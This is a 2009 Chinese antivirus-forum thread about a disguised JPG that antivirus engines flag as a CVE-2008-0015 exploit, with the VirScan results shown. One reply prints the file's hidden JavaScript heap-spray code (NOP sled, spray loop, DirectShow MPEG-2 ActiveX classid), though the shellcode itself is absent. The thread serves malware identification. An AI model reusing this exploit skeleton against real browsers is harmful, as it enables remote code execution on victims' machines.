1   1  /  1  页   跳转

[原创] 惊现图片病毒!

惊现图片病毒!

在浏览网页的时候,费尔托斯特安全突然报警!而瑞星却安然无事,我打开费尔的隔离中心,发现了一个图片文件触发了费尔,于是上http://www.virscan.org/扫描了一下,今人的发现了这个图片文件被7个杀软报毒!
测试结果:
文件信息
文件名称 :  图片病毒.zip
文件大小 :  481 byte
文件类型 :  Zip archive data, at least v2.0 to extract
MD5 :  4381303c5b4d3a106beb65e67c8e205d
SHA1 :  353c66c93b133dd401095cf61a1c05beb563c722
扫描结果
扫描结果 :  18%的杀软(7/38)报告发现病毒
时间 :  2009/07/08 13:31:33 (CST)
软件名称引擎版本
病毒库版本
病毒库时间
扫描结果
时间
a-squared4.5.0.1200907072303232009-07-07-
0.382
AntiVir8.2.0.2047.1.4.1972009-07-07HEUR/HTML.Malware
0.069
Arcavir20092009070721282009-07-07-
0.005
Authentium5.1.12009070722232009-07-07-
1.228
AVAST!4.7.4090707-02009-07-07JS:CVE-2008-0015-A [Expl]
0.002
AVG8.5.286270.13.8/22232009-07-08-
3.418
BitDefender7.81008.36549677.264382009-07-08-
3.246
CA (VET)9.0.0.14331.6.6601 2009-07-08-
6.060
ClamAV0.95.295402009-07-07-
0.004
Comodo3.1015782009-07-07-
0.686
CP Secure1.1.0.7152009.07.082009-07-08-
11.330
Dr.Web4.44.0.91702009.07.082009-07-08-
4.962
F-Prot4.4.4.56200907072009-07-07-
1.241
F-Secure5.51.61002009.07.08.042009-07-08-
0.059
GData19.6342/19.389200907082009-07-08JS:CVE-2008-0015-A [Expl] [Engine:B]
5.055
IkarusT3.1.01.642009.07.08.729972009-07-08Virus.JS.CVE.2008
3.457
Microsoft1.48032009.07.072009-07-07Exploit:JS/CVE-2008-0015
4.970
mks_vir2.012009.07.062009-07-06-
3.324
Norman6.01.096.01.002009-07-07JS/Shellcode.R
4.014
nProtect20090708.0146626742009-07-08-
7.296
Quick Heal10.002009.07.082009-07-08-
1.097
Sophos2.88.04.432009-07-08-
2.792
Sunbelt523652362009-07-07-
0.903
The Hacker6.3.4.3v003632009-07-07-
0.726
VBA323.12.10.720090707.15542009-07-07-
2.171
ViRobot200907072009.07.072009-07-07-
0.412
VirusBuster4.5.11.1010.107.38/17630412009-07-06-
2.674
卡巴斯基5.5.102009.07.082009-07-08-
0.025
安博士V32009.07.08.012009.07.082009-07-08-
0.723
安天2.0.1820090705.25966362009-07-05-
0.122
江民杀毒11.0.8002009.07.072009-07-07-
3.328
熊猫卫士9.05.012009.07.072009-07-07-
3.716
瑞星20.021.37.20.002009-07-08-
0.354
赛门铁克1.3.0.2420090707.0032009-07-07-
0.306
趋势科技8.700-10046.256.052009-07-07-
0.021
迈克菲5.3.0056692009-07-07Exploit-MSDirectShow.b
2.942
金山毒霸2009.2.5.152009.7.8.72009-07-08-
0.488
飞塔2.81-3.12010.5822009-07-07-
0.189
想请大家看看,真的出现了图片病毒了吗!!?

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

附件附件:

下载次数:189
文件类型:application/x-zip-compressed
文件大小:
上传时间:2009-7-8 13:36:28
描述:zip

分享到:
gototop
 

回复:惊现图片病毒!

文件名:go1[1].jpg
不是病毒
最后编辑瑞星工程师19 最后编辑于 2009-07-09 10:50:37
gototop
 

回复:惊现图片病毒!

假图片!

var headersize=20;
seee = '9090';
saaa ='%u9';
skkk ='090%u';
sxxx = saaa + skkk + seee;
var omybro=unescape(sxxx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace) omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
wjsccccccg=omybro.substring(0,omybro.length-slackspace);
while(wjsccccccg.length+slackspace<0x30000) wjsccccccg=wjsccccccg+wjsccccccg+bZmybr;
memory=new Array();
for(x=0;x<300;x++) memory[x]=wjsccccccg+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
gototop
 

回复:惊现图片病毒!

请将浏览的网页地址报上来
不认识我没关系,因为我也不认识你。
gototop
 

回复:惊现图片病毒!

不是图片病毒,是MPEG-2 0DAY的溢出代码....
PM偶时请附上求助贴的地址...
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT